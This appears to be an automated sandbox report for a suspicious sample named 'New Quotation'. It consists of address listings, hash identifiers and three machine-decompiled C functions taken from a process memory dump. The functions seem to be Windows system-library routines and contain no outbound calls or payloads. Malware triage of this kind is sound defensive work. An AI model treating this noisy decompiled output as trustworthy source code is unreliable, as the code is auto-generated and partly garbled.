                                                                                                                                                                                          0x1d83ea31
                                                                                                                                                                                          0x1d83ea29
                                                                                                                                                                                          0x1d83ea2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea2c
                                                                                                                                                                                          0x1d83ea0a
                                                                                                                                                                                          0x1d83ea0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ea7f
                                                                                                                                                                                          0x1d83ea85
                                                                                                                                                                                          0x1d83ea86
                                                                                                                                                                                          0x1d83ea89
                                                                                                                                                                                          0x1d83ea8c
                                                                                                                                                                                          0x1d83ea8f
                                                                                                                                                                                          0x1d83ea8f
                                                                                                                                                                                          0x1d83ea98
                                                                                                                                                                                          0x1d83ea9b
                                                                                                                                                                                          0x1d83eaa0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fcd84
                                                                                                                                                                                          0x1d7fcd84
                                                                                                                                                                                          0x1d7fcd88
                                                                                                                                                                                          0x1d7fcd8a
                                                                                                                                                                                          0x1d7fcd8d
                                                                                                                                                                                          0x1d7fcd8f
                                                                                                                                                                                          0x1d7fcd92
                                                                                                                                                                                          0x1d7fcd92
                                                                                                                                                                                          0x1d7fcd95
                                                                                                                                                                                          0x1d83eaaf
                                                                                                                                                                                          0x1d83eab2
                                                                                                                                                                                          0x1d83eab5
                                                                                                                                                                                          0x1d83eab5
                                                                                                                                                                                          0x1d7fcd9b
                                                                                                                                                                                          0x1d7fcda1
                                                                                                                                                                                          0x1d7fcda6
                                                                                                                                                                                          0x1d7fcdab
                                                                                                                                                                                          0x1d83eae3
                                                                                                                                                                                          0x1d83eae5
                                                                                                                                                                                          0x1d83eaeb
                                                                                                                                                                                          0x1d83eaeb
                                                                                                                                                                                          0x1d7fcdb1
                                                                                                                                                                                          0x1d7fcdb3
                                                                                                                                                                                          0x1d83eac1
                                                                                                                                                                                          0x1d83eac4
                                                                                                                                                                                          0x1d83eac6
                                                                                                                                                                                          0x1d7fcdb9
                                                                                                                                                                                          0x1d7fcdb9
                                                                                                                                                                                          0x1d7fcdb9
                                                                                                                                                                                          0x1d7fcdbf
                                                                                                                                                                                          0x1d83ead0
                                                                                                                                                                                          0x1d83ead5
                                                                                                                                                                                          0x1d83eada
                                                                                                                                                                                          0x1d83eada
                                                                                                                                                                                          0x1d7fcdbf
                                                                                                                                                                                          0x1d7fcdcb
                                                                                                                                                                                          0x1d7fcdcc
                                                                                                                                                                                          0x1d7fcdcd
                                                                                                                                                                                          0x1d7fcdce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fcdd1
                                                                                                                                                                                          0x1d7fcd7e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                                                                                                                          • Instruction ID: cf2fc46bae4e749c5d0a781d58d379de04cf8593a9dfb7cf6daecc1e4d1c8cba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B5186B5D0028AEBCF15CF98C5C06EDBBB1FB54211F158265D919B7384D334EA41CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D89892E Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D89892E(signed int __ecx, void* __edx, void* __eflags, unsigned int _a4, intOrPtr _a8) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* _t60;
				signed int _t64;
				char* _t74;
				signed int _t97;
				unsigned int _t102;
				signed int _t118;
				signed int _t126;
				signed int _t130;
				signed int _t135;

				_v16 = _v16 & 0x00000000;
				_t130 = __ecx;
				_v20 = 0x580;
				_t60 = E1D8968AE(__edx);
				_t126 = 0x1000;
				_push(_a8);
				_t102 = _a4;
				_v12 = 0x1000;
				_t97 = 0;
				_t118 = _v20 + _t60 - (_v20 + _t60 - 0x00000001 & 0x00000fff) + 0xfff;
				_v20 = _t118;
				_t64 =  *((intOrPtr*)(E1D899682(_t102)));
				_v16 = _t64;
				if(_t64 == 0 || ( *0x1d8c38c0 & 0x00000008) != 0 || (__ecx & 0x40000000) != 0 || _t102 >> 0x10 != 0 || _t118 >=  *((intOrPtr*)(_v12 + 0x18c))) {
					asm("sbb ebx, ebx");
					_t97 = _t97 & 0x01000000;
					asm("sbb esi, esi");
					_t134 = ( ~(_t130 & 0x40000000) & 0x0000003c) + 4;
					if(E1D898009( &_v20,  &_v24, 0, _t97 | 0x00002000, ( ~(_t130 & 0x40000000) & 0x0000003c) + 4, _t102, _a8) >= 0) {
						if(E1D898009( &_v20,  &_v16, 0, _t97 | _t126, _t134, _a4, _a8) < 0) {
							goto L8;
						} else {
							if(E1D7E3C40() == 0) {
								_t74 = 0x7ffe0380;
							} else {
								_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							if( *_t74 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								_t126 = _v16;
							} else {
								_t126 = _v16;
								E1D88EFD3(_t97, _v20, _v20, _t126, 0xb);
							}
							_t135 = _v20;
							_v20 = _v20 & 0x00000000;
							_v16 = _v16 & 0x00000000;
							goto L18;
						}
					} else {
						L8:
						_t135 = 0;
					}
				} else {
					_v16 = 1;
					_t135 = E1D8994F9(_v24, 0x1000, 1, _t102, _a8);
					if(_t135 != 0) {
						_t22 = _t135 + 0x1000; // 0x1000
						E1D89959F(_t135, _t22, _v24 + 0xfffff000, 0, _a4, _a8);
						L18:
						E1D818F40(_t135, 0, 0x580);
						 *((intOrPtr*)(_t135 + 0xb8)) = _t135 + 0x580;
						 *((intOrPtr*)(_t135 + 0xbc)) = _t135 + _t126;
						 *((intOrPtr*)(_t135 + 0xc0)) = _v24 + _t135;
						 *(_t135 + 0x16) =  *(_t135 + 0x16) & 0x0000fffe | _v16;
						asm("lock xadd [eax], ecx");
						asm("lock xadd [eax], edi");
					}
				}
				if(_v20 != 0) {
					_push(_a8);
					_push(_a4);
					_push(_t97 | 0x00008000);
					E1D898845( &_v20,  &_v24);
				}
				return _t135;
			}

















                                                                                                                                                                                          0x1d898939
                                                                                                                                                                                          0x1d898940
                                                                                                                                                                                          0x1d898942
                                                                                                                                                                                          0x1d89894d
                                                                                                                                                                                          0x1d898956
                                                                                                                                                                                          0x1d89895b
                                                                                                                                                                                          0x1d89895e
                                                                                                                                                                                          0x1d898964
                                                                                                                                                                                          0x1d898968
                                                                                                                                                                                          0x1d898974
                                                                                                                                                                                          0x1d89897a
                                                                                                                                                                                          0x1d898983
                                                                                                                                                                                          0x1d898985
                                                                                                                                                                                          0x1d89898b
                                                                                                                                                                                          0x1d898a03
                                                                                                                                                                                          0x1d898a0f
                                                                                                                                                                                          0x1d898a19
                                                                                                                                                                                          0x1d898a23
                                                                                                                                                                                          0x1d898a31
                                                                                                                                                                                          0x1d898a57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898a59
                                                                                                                                                                                          0x1d898a60
                                                                                                                                                                                          0x1d898a72
                                                                                                                                                                                          0x1d898a62
                                                                                                                                                                                          0x1d898a6b
                                                                                                                                                                                          0x1d898a6b
                                                                                                                                                                                          0x1d898a7a
                                                                                                                                                                                          0x1d898a9f
                                                                                                                                                                                          0x1d898a8b
                                                                                                                                                                                          0x1d898a91
                                                                                                                                                                                          0x1d898a98
                                                                                                                                                                                          0x1d898a98
                                                                                                                                                                                          0x1d898aa3
                                                                                                                                                                                          0x1d898aa7
                                                                                                                                                                                          0x1d898aac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898aac
                                                                                                                                                                                          0x1d898a33
                                                                                                                                                                                          0x1d898a33
                                                                                                                                                                                          0x1d898a33
                                                                                                                                                                                          0x1d898a33
                                                                                                                                                                                          0x1d8989b3
                                                                                                                                                                                          0x1d8989c1
                                                                                                                                                                                          0x1d8989ca
                                                                                                                                                                                          0x1d8989ce
                                                                                                                                                                                          0x1d8989db
                                                                                                                                                                                          0x1d8989ee
                                                                                                                                                                                          0x1d898ab1
                                                                                                                                                                                          0x1d898ab9
                                                                                                                                                                                          0x1d898ac9
                                                                                                                                                                                          0x1d898ad5
                                                                                                                                                                                          0x1d898ae1
                                                                                                                                                                                          0x1d898af3
                                                                                                                                                                                          0x1d898b04
                                                                                                                                                                                          0x1d898b11
                                                                                                                                                                                          0x1d898b11
                                                                                                                                                                                          0x1d8989ce
                                                                                                                                                                                          0x1d898b1a
                                                                                                                                                                                          0x1d898b1c
                                                                                                                                                                                          0x1d898b29
                                                                                                                                                                                          0x1d898b30
                                                                                                                                                                                          0x1d898b31
                                                                                                                                                                                          0x1d898b31
                                                                                                                                                                                          0x1d898b3e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9710fdfcbfebd9202b79a14e775eed742e6b7df48f4be322947a6bb4619af1ae
                                                                                                                                                                                          • Instruction ID: 04bcf429222c4dcf428b220ed1a1552847f7bb3f72d00a2dd0b6d45bc97a5b28
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9710fdfcbfebd9202b79a14e775eed742e6b7df48f4be322947a6bb4619af1ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9518D716187029FD71ACF28C840BAAB7E5EFC4750F018929F99597290D738E909CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C7C85 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E1D7C7C85(char __ecx) {
				short* _v20;
				void* _v28;
				char _v29;
				void* _v32;
				intOrPtr* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1D7DFED0(0x1d8c5b40);
					_t104 =  *0x1d8c6390; // 0x18e2c50
					if(_t104 == 0) {
						_t49 = 0;
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x46000000
					_push(0x1d8c5b40);
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E1D7DE740(_t93);
					if( *((char*)(_t108 + 0xf)) == 0) {
						L5:
						_t49 = _t104;
						break;
					}
					_t101 =  *0x7ffe02dc;
					if(( *(_t104 + 0x14) & 0x00000001) != 0 || 0x7ffe02dc != _v20) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0x90028);
						_push(_t108 + 0x20);
						_push(0);
						_push(0);
						_push(0);
						_t10 = _t104 + 4; // 0x0
						_push( *_t10);
						_t53 = E1D812D40();
						__eflags = _t53;
						if(_t53 >= 0) {
							__eflags =  *(_t104 + 0x14) & 0x00000001;
							if(( *(_t104 + 0x14) & 0x00000001) == 0) {
								E1D7DFED0(0x1d8c5b40);
								_push(0x1d8c5b40);
								 *((intOrPtr*)(_t104 + 8)) = _t101;
								E1D7DE740(0);
							}
							goto L5;
						}
						__eflags = _t53 - 0xc0000012;
						if(__eflags == 0) {
							L11:
							_t11 = _t104 + 0xe; // 0x8e2c6802
							_t13 = _t104 + 0xc; // 0x18e2c5d
							_t93 = _t13;
							 *((char*)(_t108 + 0x12)) = 0;
							__eflags = E1D8041BB(_t13,  *_t11 & 0x0000ffff, __eflags, _t108 + 0x10);
							if(__eflags >= 0) {
								L14:
								_t102 =  *((intOrPtr*)(_t108 + 0x10));
								 *_t102 = 2;
								_v20 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
								E1D7DFED0(0x1d8c5b40);
								__eflags =  *0x1d8c6390 - _t104; // 0x18e2c50
								if(__eflags == 0) {
									__eflags =  *((char*)(_t108 + 0xe));
									_t95 = _v20;
									 *0x1d8c6390 = _t102;
									_t32 = _t102 + 0xc; // 0x0
									 *_t95 =  *_t32;
									_t33 = _t102 + 0x10; // 0x0
									 *((intOrPtr*)(_t95 + 4)) =  *_t33;
									_t35 = _t102 + 4; // 0xffffffff
									 *((intOrPtr*)(_t95 + 8)) =  *_t35;
									if(__eflags != 0) {
										_t37 = _t104 + 0x10; // 0x20018e2c
										_t95 =  *((intOrPtr*)( *_t37));
										E1D84D87C(_t89,  *((intOrPtr*)( *_t37)), __eflags);
									}
									_push(0x1d8c5b40);
									E1D7DE740(_t95);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t38 = _t104 + 4; // 0x0
										_push( *_t38);
										E1D812A80();
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									asm("lock xadd [esi], ebx");
									__eflags = _t89 == 1;
									if(_t89 == 1) {
										_t41 = _t104 + 4; // 0x0
										_push( *_t41);
										E1D812A80();
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									_t49 = _t102;
									break;
								}
								_push(0x1d8c5b40);
								E1D7DE740(_t93);
								asm("lock xadd [esi], eax");
								if(__eflags == 0) {
									_t25 = _t104 + 4; // 0x0
									_push( *_t25);
									E1D812A80();
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
									_t102 = _v36;
								}
								 *_t102 = 1;
								asm("lock xadd [edi], eax");
								if(__eflags == 0) {
									_t28 = _t102 + 4; // 0xffffffff
									_push( *_t28);
									E1D812A80();
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
								}
								continue;
							}
							_t15 = _t104 + 0x10; // 0x20018e2c
							_t93 = _t108 + 0x18;
							_t17 = _t104 + 0xe; // 0x8e2c6802
							 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
							_t85 = 6;
							 *((short*)(_t108 + 0x18)) = _t85;
							_t87 = E1D8041BB(_t108 + 0x18,  *_t17 & 0x0000ffff, __eflags, _t108 + 0x10);
							__eflags = _t87;
							if(_t87 < 0) {
								goto L5;
							}
							 *((char*)(_t108 + 0xe)) = 1;
							goto L14;
						}
						__eflags = _t53 - 0xc000026e;
						if(__eflags != 0) {
							goto L5;
						}
						goto L11;
					} else {
						goto L5;
					}
				}
				return _t49;
			}

























                                                                                                                                                                                          0x1d7c7c85
                                                                                                                                                                                          0x1d7c7c8d
                                                                                                                                                                                          0x1d7c7c90
                                                                                                                                                                                          0x1d7c7c93
                                                                                                                                                                                          0x1d7c7c97
                                                                                                                                                                                          0x1d7c7c9a
                                                                                                                                                                                          0x1d7c7c9f
                                                                                                                                                                                          0x1d7c7ca4
                                                                                                                                                                                          0x1d7c7cac
                                                                                                                                                                                          0x1d7c7ced
                                                                                                                                                                                          0x1d7c7cef
                                                                                                                                                                                          0x1d7c7cef
                                                                                                                                                                                          0x1d7c7cae
                                                                                                                                                                                          0x1d7c7cb1
                                                                                                                                                                                          0x1d7c7cb4
                                                                                                                                                                                          0x1d7c7cb9
                                                                                                                                                                                          0x1d7c7cbd
                                                                                                                                                                                          0x1d7c7cc7
                                                                                                                                                                                          0x1d7c7ce4
                                                                                                                                                                                          0x1d7c7ce4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7ce4
                                                                                                                                                                                          0x1d7c7cce
                                                                                                                                                                                          0x1d7c7cd4
                                                                                                                                                                                          0x1d82b0a6
                                                                                                                                                                                          0x1d82b0a7
                                                                                                                                                                                          0x1d82b0a8
                                                                                                                                                                                          0x1d82b0a9
                                                                                                                                                                                          0x1d82b0aa
                                                                                                                                                                                          0x1d82b0af
                                                                                                                                                                                          0x1d82b0b0
                                                                                                                                                                                          0x1d82b0b1
                                                                                                                                                                                          0x1d82b0b2
                                                                                                                                                                                          0x1d82b0b3
                                                                                                                                                                                          0x1d82b0b3
                                                                                                                                                                                          0x1d82b0b6
                                                                                                                                                                                          0x1d82b0bb
                                                                                                                                                                                          0x1d82b0bd
                                                                                                                                                                                          0x1d82b231
                                                                                                                                                                                          0x1d82b235
                                                                                                                                                                                          0x1d82b241
                                                                                                                                                                                          0x1d82b246
                                                                                                                                                                                          0x1d82b247
                                                                                                                                                                                          0x1d82b24a
                                                                                                                                                                                          0x1d82b24a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82b235
                                                                                                                                                                                          0x1d82b0c3
                                                                                                                                                                                          0x1d82b0c8
                                                                                                                                                                                          0x1d82b0d5
                                                                                                                                                                                          0x1d82b0d5
                                                                                                                                                                                          0x1d82b0de
                                                                                                                                                                                          0x1d82b0de
                                                                                                                                                                                          0x1d82b0e1
                                                                                                                                                                                          0x1d82b0eb
                                                                                                                                                                                          0x1d82b0ed
                                                                                                                                                                                          0x1d82b11d
                                                                                                                                                                                          0x1d82b123
                                                                                                                                                                                          0x1d82b132
                                                                                                                                                                                          0x1d82b138
                                                                                                                                                                                          0x1d82b13c
                                                                                                                                                                                          0x1d82b141
                                                                                                                                                                                          0x1d82b147
                                                                                                                                                                                          0x1d82b1a8
                                                                                                                                                                                          0x1d82b1ad
                                                                                                                                                                                          0x1d82b1b1
                                                                                                                                                                                          0x1d82b1b7
                                                                                                                                                                                          0x1d82b1bb
                                                                                                                                                                                          0x1d82b1be
                                                                                                                                                                                          0x1d82b1c1
                                                                                                                                                                                          0x1d82b1c4
                                                                                                                                                                                          0x1d82b1c7
                                                                                                                                                                                          0x1d82b1ca
                                                                                                                                                                                          0x1d82b1cc
                                                                                                                                                                                          0x1d82b1cf
                                                                                                                                                                                          0x1d82b1d2
                                                                                                                                                                                          0x1d82b1d2
                                                                                                                                                                                          0x1d82b1d7
                                                                                                                                                                                          0x1d82b1dc
                                                                                                                                                                                          0x1d82b1e3
                                                                                                                                                                                          0x1d82b1e7
                                                                                                                                                                                          0x1d82b1e9
                                                                                                                                                                                          0x1d82b1e9
                                                                                                                                                                                          0x1d82b1ec
                                                                                                                                                                                          0x1d82b1fd
                                                                                                                                                                                          0x1d82b202
                                                                                                                                                                                          0x1d82b202
                                                                                                                                                                                          0x1d82b206
                                                                                                                                                                                          0x1d82b20a
                                                                                                                                                                                          0x1d82b20b
                                                                                                                                                                                          0x1d82b20d
                                                                                                                                                                                          0x1d82b20d
                                                                                                                                                                                          0x1d82b210
                                                                                                                                                                                          0x1d82b221
                                                                                                                                                                                          0x1d82b226
                                                                                                                                                                                          0x1d82b226
                                                                                                                                                                                          0x1d82b22a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82b22a
                                                                                                                                                                                          0x1d82b149
                                                                                                                                                                                          0x1d82b14e
                                                                                                                                                                                          0x1d82b155
                                                                                                                                                                                          0x1d82b159
                                                                                                                                                                                          0x1d82b15b
                                                                                                                                                                                          0x1d82b15b
                                                                                                                                                                                          0x1d82b15e
                                                                                                                                                                                          0x1d82b16f
                                                                                                                                                                                          0x1d82b174
                                                                                                                                                                                          0x1d82b174
                                                                                                                                                                                          0x1d82b178
                                                                                                                                                                                          0x1d82b180
                                                                                                                                                                                          0x1d82b184
                                                                                                                                                                                          0x1d82b18a
                                                                                                                                                                                          0x1d82b18a
                                                                                                                                                                                          0x1d82b18d
                                                                                                                                                                                          0x1d82b19e
                                                                                                                                                                                          0x1d82b19e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82b184
                                                                                                                                                                                          0x1d82b0ef
                                                                                                                                                                                          0x1d82b0f2
                                                                                                                                                                                          0x1d82b0f6
                                                                                                                                                                                          0x1d82b0fc
                                                                                                                                                                                          0x1d82b100
                                                                                                                                                                                          0x1d82b101
                                                                                                                                                                                          0x1d82b10b
                                                                                                                                                                                          0x1d82b110
                                                                                                                                                                                          0x1d82b112
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82b118
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82b118
                                                                                                                                                                                          0x1d82b0ca
                                                                                                                                                                                          0x1d82b0cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c7cd4
                                                                                                                                                                                          0x1d7c7cec

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 399f4f152d3d3af201b64e527606108e68885a124aa062294a13d54155eff680
                                                                                                                                                                                          • Instruction ID: 0b2eab183cb9b3db21ead5f9efdf235759aff935689efa897e20b030e5be633b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 399f4f152d3d3af201b64e527606108e68885a124aa062294a13d54155eff680
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF519C75109782AFC7228F24C845B6ABBE8FF44720F05085EF5A98B661E734F844CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FAD20 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                          			E1D7FAD20(intOrPtr _a4, signed int** _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t51;
				signed int _t59;
				unsigned int _t64;
				unsigned int _t75;
				signed int _t76;
				void* _t81;
				signed int* _t82;
				signed int _t85;
				signed int _t86;
				intOrPtr _t88;
				signed int _t89;
				signed int _t91;
				signed int* _t93;
				void* _t108;

				_t85 = _a12;
				_v12 = _v12 & 0x00000000;
				if((_t85 & 0xfffffff8) != 0 || (_t85 & 0x00000005 & (_t85 & 0x00000005) - 0x00000001) != 0) {
					L26:
					return 0xc00000f1;
				} else {
					_t41 = _t85 & 0x00000002;
					_v20 = _t41;
					_t91 = _t85 & 1;
					if(_t41 != 0) {
						__eflags = _t91;
						if(_t91 != 0) {
							goto L3;
						}
						goto L26;
					}
					L3:
					_t88 = _a4;
					if(_t88 != 0) {
						_t86 = _t85 & 0x00000004;
						__eflags = _t86;
						if(_t86 == 0) {
							L6:
							if(_t86 != 0) {
								L19:
								_push("true");
								_pop(_t81);
								_t82 = E1D7FB9FA(_t81);
								__eflags = _t82;
								if(_t82 == 0) {
									return 0xc000009a;
								}
								 *_t82 =  *_t82 & 0x00000000;
								 *_a8 = _t82;
								L17:
								return 0;
							}
							if(_t88 != 0) {
								_v8 = _v8 & 0x00000000;
								_v16 = _t91 ^ 1;
								_t75 = E1D7FBA17(_t88, _t91 ^ 1);
								while(1) {
									L9:
									_t84 = _t75;
									_t93 = E1D7FB9FA(_t75);
									if(_t93 == 0) {
										break;
									}
									if(_v8 != 1) {
										L13:
										if(_v16 != 1) {
											__eflags = _v20;
											_push(_t75 >> 1);
											_push(_t88);
											_push(0);
											_push(_t75);
											_push(_t93);
											if(__eflags != 0) {
												_t51 = E1D7CAD10(_t75, _t88, __eflags);
											} else {
												_t51 = E1D801E80(_t75, _t88, _t93);
											}
											_t89 = _t51;
											__eflags = _t89;
											if(_t89 >= 0) {
												L16:
												 *_a8 = _t93;
												goto L17;
											} else {
												E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
												L35:
												return _t89;
											}
										}
										E1D8188C0(_t93, _t88, _t75);
										if(_v8 == 1) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E1D7DE740(_t84);
										}
										goto L16;
									}
									_t84 =  *[fs:0x30];
									E1D7DFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_t59 = _v12;
									_t88 =  *((intOrPtr*)(_t59 + 0x48));
									if(_t88 == 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E1D7DE740(_t84);
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										goto L19;
									}
									_t64 =  *(_t59 + 0x290);
									_t108 = _t64 - _t75;
									_t75 = _t64;
									if(_t108 > 0) {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
										E1D7DE740(_t84);
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
										continue;
									}
									goto L13;
								}
								_t89 = 0xc000009a;
								goto L35;
							}
							_v16 = 1;
							_v8 = 1;
							_t76 =  *( *[fs:0x30] + 0x10);
							_v12 = _t76;
							E1D7DFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							_t88 =  *((intOrPtr*)(_t76 + 0x48));
							_t75 =  *(_t76 + 0x290);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
							E1D7DE740(1);
							if(_t88 == 0) {
								goto L19;
							}
							goto L9;
						}
						L22:
						return 0xc0000030;
					}
					if(_t91 != 0) {
						goto L22;
					}
					_t86 = _t85 & 0x00000004;
					goto L6;
				}
			}

























                                                                                                                                                                                          0x1d7fad28
                                                                                                                                                                                          0x1d7fad2b
                                                                                                                                                                                          0x1d7fad38
                                                                                                                                                                                          0x1d83e184
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fad4e
                                                                                                                                                                                          0x1d7fad53
                                                                                                                                                                                          0x1d7fad58
                                                                                                                                                                                          0x1d7fad5b
                                                                                                                                                                                          0x1d7fad5f
                                                                                                                                                                                          0x1d83e17c
                                                                                                                                                                                          0x1d83e17e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e17e
                                                                                                                                                                                          0x1d7fad65
                                                                                                                                                                                          0x1d7fad65
                                                                                                                                                                                          0x1d7fad6a
                                                                                                                                                                                          0x1d7fae59
                                                                                                                                                                                          0x1d7fae59
                                                                                                                                                                                          0x1d7fae5c
                                                                                                                                                                                          0x1d7fad7b
                                                                                                                                                                                          0x1d7fad7d
                                                                                                                                                                                          0x1d7fae41
                                                                                                                                                                                          0x1d7fae41
                                                                                                                                                                                          0x1d7fae43
                                                                                                                                                                                          0x1d7fae49
                                                                                                                                                                                          0x1d7fae4b
                                                                                                                                                                                          0x1d7fae4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fae82
                                                                                                                                                                                          0x1d7fae52
                                                                                                                                                                                          0x1d7fae55
                                                                                                                                                                                          0x1d7fae38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fae38
                                                                                                                                                                                          0x1d7fad85
                                                                                                                                                                                          0x1d7fae69
                                                                                                                                                                                          0x1d7fae71
                                                                                                                                                                                          0x1d7fae7b
                                                                                                                                                                                          0x1d7fadc6
                                                                                                                                                                                          0x1d7fadc6
                                                                                                                                                                                          0x1d7fadc6
                                                                                                                                                                                          0x1d7fadcd
                                                                                                                                                                                          0x1d7fadd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7faddb
                                                                                                                                                                                          0x1d7fae0a
